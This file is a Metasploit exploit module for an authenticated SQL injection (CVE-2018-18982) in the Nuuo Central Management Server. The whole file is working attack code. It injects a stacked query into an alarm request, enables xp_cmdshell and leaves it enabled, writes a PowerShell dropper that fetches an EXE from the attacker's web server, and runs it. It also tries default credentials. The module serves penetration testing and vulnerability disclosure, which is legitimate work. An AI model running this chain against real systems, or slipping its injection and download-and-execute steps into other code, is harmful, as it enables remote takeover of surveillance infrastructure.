##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
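class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::Nuuo
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Nuuo Central Management Authenticated SQL Server SQLi',
        'Description' => %q{
          The Nuuo Central Management Server allows an authenticated user to query the state of the alarms.
          This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is
          installed by default, xp_cmdshell can be enabled and abused to achieve code execution.
          This module will either use a provided session number (which can be guessed with an auxiliary
          module) or attempt to login using a provided username and password - it will also try the
          default credentials if nothing is provided.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module
        ],
        'References' => [
          [ 'CVE', '2018-18982' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/NUUO/nuuo-cms-ownage.txt' ]
        ],
        'Platform' => 'win',
        'Arch' => ARCH_X86,
        'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground
        'Targets' => [
          [ 'Nuuo Central Management Server <= v2.10.0', {} ],
        ],
        'Notes' => {
          # CONFIG_CHANGES: primer enables xp_cmdshell through sp_configure and
          # nothing in this module turns it back off, so the instance stays
          # reconfigured after the session is gone.
          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
          'Stability' => UNKNOWN_STABILITY,
          'Reliability' => UNKNOWN_RELIABILITY
        },
        'Privileged' => false, # we run as NETWORK_SERVICE
        'DisclosureDate' => '2018-10-11',
        'DefaultTarget' => 0
      )
    )
    register_options [
      Opt::RPORT(5180),
      OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]),
      OptString.new('URIPATH', [true, 'The URI to use for this exploit', "/#{rand_text_alpha(8..10)}"])
    ]
  end

  # Runs +sql+ on the CMS backend through the GETOPENALARM request.
  # The 'source_server' value lands inside a quoted string server-side, so
  # closing the quote, appending our statement and commenting out the rest of
  # the original query yields a stacked query. Needs user_session to be set
  # (done by ncs_login in #exploit). Returns whatever ncs_send_request returns.
  def inject_sql(sql)
    ncs_send_request({
      'method' => 'GETOPENALARM',
      'user_session' => user_session,
      'device_id' => rand_text_numeric(4),
      'source_server' => "';#{sql};-- ",
      'last_one' => rand_text_numeric(4)
    })
  end

  # HttpServer callback: hands the staged EXE to the CMS's PowerShell
  # downloader, then asks SQL Server to run it from C:\windows\temp.
  # @pl is populated by #exploit before the server starts; a request arriving
  # before that is rejected rather than answered with an empty body.
  def on_request_uri(cli, request)
    unless @pl
      print_error("A request came in, but the payload wasn't ready yet!")
      return
    end
    print_good('Sending the payload to CMS...')
    send_response(cli, @pl)

    # give WebClient.DownloadFile a moment to finish writing the file before
    # we try to execute it
    Rex.sleep(3)

    print_status('Executing shell...')
    inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""))
    register_file_for_cleanup("c:/windows/temp/#{@filename}")
  end

  # Wraps +cmd+ in a T-SQL snippet that declares a varchar, assigns it from a
  # 0x... hex literal and EXECs it, so the command never appears as a quoted
  # string inside the injected query and needs no quote escaping.
  #
  # Every byte must be rendered as exactly two hex digits: the previous
  # Integer#to_s(16) dropped the leading zero for bytes below 0x10, which
  # would shift every following byte of the literal. unpack('H*') pads.
  def create_hex_cmd(cmd)
    var = rand_text_alpha(2)
    hex = cmd.unpack('H*').first
    "declare @#{var} varchar(8000); select @#{var}=0x#{hex}; exec (@#{var})"
  end

  # Called by HttpServer once the listener is up: enables xp_cmdshell and makes
  # the CMS fetch @filename from our web server via a small PowerShell dropper
  # written line by line into a .ps1 in C:\windows\temp.
  def primer
    # we need to roll our own here instead of using the MSSQL mixins
    # (tried that and it doesn't work)
    service_url = "http://#{srvhost_addr}:#{srvport}#{datastore['URIPATH']}"
    print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}")
    @filename = "#{rand_text_alpha_lower(8..10)}.exe"
    ps1 = "#{rand_text_alpha_lower(8..10)}.ps1"

    # NOTE: the EXE is fetched over cleartext HTTP (#exploit forces SSL off);
    # anyone on the path between the CMS and SRVHOST could swap the binary.
    dropper = [
      'cd C:\\windows\\temp\\',
      "echo $webclient = New-Object System.Net.WebClient >> #{ps1}",
      "echo $url = \"#{service_url}\" >> #{ps1}",
      "echo $file = \"#{@filename}\" >> #{ps1}",
      "echo $webclient.DownloadFile($url,$file) >> #{ps1}",
      "powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File #{ps1}"
    ].join(' && ')
    download_pl = "xp_cmdshell '#{dropper}'"

    print_status('Injecting PowerShell payload')
    # sp_configure changes persist in the SQL Server instance; the module does
    # not revert them on cleanup (see SideEffects).
    inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl))
    register_file_for_cleanup("c:/windows/temp/#{ps1}")
  end

  # Entry point: authenticate to the CMS, build the payload, then run the HTTP
  # server (super) for at most HTTPDELAY seconds. The download URL handed to
  # the CMS is plain http://, so SSL is forced off for the listener and
  # restored afterwards regardless of how the server loop ends.
  def exploit
    connect
    ncs_login
    fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS') unless user_session

    @pl = generate_payload_exe

    # do not use SSL: the PowerShell dropper fetches a plain http:// URL
    saved_ssl = datastore['SSL']
    datastore['SSL'] = false

    begin
      Timeout.timeout(datastore['HTTPDELAY']) { super }
    rescue Timeout::Error
      # HTTPDELAY elapsed; the listener had its window, nothing more to do
    ensure
      # previously restored only on timeout, which left SSL=false in the
      # datastore whenever super returned on its own
      datastore['SSL'] = saved_ssl
    end
  end
end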